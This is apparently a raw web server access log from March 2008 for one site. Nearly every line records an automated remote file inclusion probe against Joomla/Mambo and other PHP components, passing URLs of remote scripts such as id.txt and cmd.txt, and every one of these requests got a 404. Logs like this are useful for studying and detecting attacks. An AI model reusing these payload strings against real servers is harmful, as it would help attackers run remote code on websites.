80.70.113.10 - - [25/Mar/2008:06:18:44 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
80.70.113.10 - - [25/Mar/2008:06:18:44 -0700] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://theninjalegion.com/etc/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
88.198.5.142 - - [25/Mar/2008:06:19:07 -0700] "GET /mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:19:10 -0700] "GET /test.php?page=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:19:32 -0700] "GET /index1.php?pg=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:19:37 -0700] "GET /index1.php?pg=http://www.backhuys.nl/.../cgibin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:19:43 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:19:49 -0700] "GET /logs/access.log/index1.php?menu=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:19:49 -0700] "GET /logs/index1.php?menu=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:19:50 -0700] "GET /logs/access_080127.log/index1.php?menu=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.9.78.190 - - [25/Mar/2008:06:20:50 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.col.fr/img/xpll.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.70.163 - - [25/Mar/2008:06:20:58 -0700] "GET /logs/access_071202.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.doggypost.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.3.167.234 - - [25/Mar/2008:06:21:09 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:21:10 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:21:18 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:21:18 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:21:18 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:06:21:20 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:21:25 -0700] "GET /logs/access.log/index1.php?menu=http://www.backhuys.nl/.../cgibin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:21:25 -0700] "GET /logs/index1.php?menu=http://www.backhuys.nl/.../cgibin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:06:21:26 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.18.76 - - [25/Mar/2008:06:21:34 -0700] "GET /index.php?redir=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.167.234 - - [25/Mar/2008:06:21:39 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.3.167.234 - - [25/Mar/2008:06:21:39 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.18.76 - - [25/Mar/2008:06:21:40 -0700] "GET /index.php?redir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.3.167.234 - - [25/Mar/2008:06:21:40 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:06:21:42 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:06:21:45 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:06:21:47 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.16.121.90 - - [25/Mar/2008:06:21:48 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:21:56 -0700] "GET /logs/access.log/index1.php?menu=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:21:57 -0700] "GET /logs/index1.php?menu=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:21:58 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.backhuys.nl/.../cgibin.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:06:22:03 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:06:22:03 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.238.63 - - [25/Mar/2008:06:22:03 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:22:09 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:22:09 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:22:10 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:22:17 -0700] "GET /index1.php?pg=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:06:22:38 -0700] "GET //openi-admin/base/fileloader.php?config[openi_dir]=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
158.110.147.192 - - [25/Mar/2008:06:22:38 -0700] "GET /logs//openi-admin/base/fileloader.php?config[openi_dir]=http://www.fleecegigs.co.uk/images/tetas.jpg?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:22:38 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:22:38 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:22:51 -0700] "GET /logs/access_080127.log/index1.php?menu=http://www.koreacarcare.com/becommunity/conf/temp/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [25/Mar/2008:06:23:10 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [25/Mar/2008:06:23:10 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.193.215.56 - - [25/Mar/2008:06:23:11 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.moonbaesool.co.kr/guest/icon/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:23:11 -0700] "GET //activecontent.php?vsDragonRootPath=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.21.223.90 - - [25/Mar/2008:06:23:34 -0700] "GET /logs/access_080120.log//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.apfinanz.de/components/com_artlinks/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:23:54 -0700] "GET /logs/access_080218.log//activecontent.php?vsDragonRootPath=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:23:54 -0700] "GET //activecontent.php?vsDragonRootPath=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:23:54 -0700] "GET /logs//activecontent.php?vsDragonRootPath=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:24:16 -0700] "GET /logs/access_071212.log//spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:24:16 -0700] "GET //spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:24:16 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:24:16 -0700] "GET /logs/access_071212.log//spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:24:17 -0700] "GET /logs/access_071212.log//spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:24:17 -0700] "GET //spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.10.154.114 - - [25/Mar/2008:06:24:17 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://aoka.sleepsycho.com/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.53.125 - - [25/Mar/2008:06:24:21 -0700] "GET /logs/access_080207.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.redladys.net/tgp/alat/idscan3??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:24:21 -0700] "GET //spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.52.9.218 - - [25/Mar/2008:06:24:22 -0700] "GET /logs//spaw_control.class.php?spaw_root=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:24:29 -0700] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:24:30 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:06:24:39 -0700] "GET /logs/access_080118.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:06:24:39 -0700] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.36.235.74 - - [25/Mar/2008:06:24:42 -0700] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.dominpe.com/images/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.239.121.190 - - [25/Mar/2008:06:24:54 -0700] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://acme-superstore.com/mlm/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.177.56.40 - - [25/Mar/2008:06:24:54 -0700] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.varliktanveriler.com/guestbook/public/echo4? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.189.9.214 - - [25/Mar/2008:06:25:16 -0700] "GET /mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
213.189.9.214 - - [25/Mar/2008:06:25:16 -0700] "GET /logs/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://www.isleconnect.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:06:25:22 -0700] "GET /logs/access.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:06:25:22 -0700] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
68.73.90.73 - - [25/Mar/2008:06:25:55 -0700] "GET /logs/access_080119.log/page.php5?id=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:06:26:12 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:06:26:12 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.226.180 - - [25/Mar/2008:06:26:14 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://vivace.biz/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.20.57.43 - - [25/Mar/2008:06:26:58 -0700] "GET /logs/access_080215.log//activecontent.php?vsDragonRootPath=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [25/Mar/2008:06:28:24 -0700] "GET /logs/access_080126.log/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:06:28:47 -0700] "GET /logs/access_080207.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:06:28:47 -0700] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:06:28:56 -0700] "GET /logs/access_080215.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:06:28:56 -0700] "GET /logs/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
80.35.0.230 - - [25/Mar/2008:06:29:09 -0700] "GET /logs/access_080120.log/index.php?option=com_puarcade&Itemid=&mosConfig_absolute_path=http://www.woopss.de/conf/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.7.207.104 - - [25/Mar/2008:06:29:34 -0700] "GET /logs/access_080312.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:29:45 -0700] "GET /logs/access_080118.log//index.php?option=http://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:29:46 -0700] "GET //index.php?option=http://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.228.130 - - [25/Mar/2008:06:29:46 -0700] "GET /logs//index.php?option=http://www.jef.at/vnc/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:29:48 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:29:54 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:29:55 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.106.37.48 - - [25/Mar/2008:06:29:55 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://www.cypcaribbean.org/cyp/phpBB/images/smiles/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.27.87 - - [25/Mar/2008:06:29:56 -0700] "GET /tmp/sess_4ef00605a56cd63b3a6cfda39740bc6b HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
69.42.217.194 - - [25/Mar/2008:06:30:16 -0700] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
69.42.217.194 - - [25/Mar/2008:06:30:16 -0700] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://owell.us/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:30:27 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:30:28 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.149.36.33 - - [25/Mar/2008:06:30:28 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://csandberg.net/joomla/language/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:30:48 -0700] "GET /logs/access_080117.log/index1.php?pg=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.189.126.85 - - [25/Mar/2008:06:30:48 -0700] "GET /logs/index1.php?pg=http://xdengue01.iespana.es/bds/sefe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:30:48 -0700] "GET /logs/access_080131.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:30:49 -0700] "GET /logs//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.5.142 - - [25/Mar/2008:06:31:34 -0700] "GET /logs/access_080211.log/mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0" "www.dmulk.com"
88.198.5.142 - - [25/Mar/2008:06:31:34 -0700] "GET /logs/mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:06:31:35 -0700] "GET /logs/access_080118.log/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:06:31:35 -0700] "GET /index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.22.204.188 - - [25/Mar/2008:06:31:36 -0700] "GET /logs/index.php?option=com_achtube&Itemid=&mosConfig_absolute_path=http://madinaedu.gov.sa/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.92.87.157 - - [25/Mar/2008:06:31:52 -0700] "GET /logs/access_080218.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.lankawe.com/ioncube/readme.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.198.5.142 - - [25/Mar/2008:06:32:06 -0700] "GET /logs/access_080312.log/mambots/content/multithumb/multithumb?mosConfig_absolute_path=http://buckleymanagement.com/images/img? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:32:38 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
209.67.217.154 - - [25/Mar/2008:06:32:38 -0700] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://www.jbwc.or.kr/bbs/skin/zero_vote/data/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
62.193.224.20 - - [25/Mar/2008:06:33:24 -0700] "GET /logs/access_080126.log/index1.php?pg=http://www.defacerz.org/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
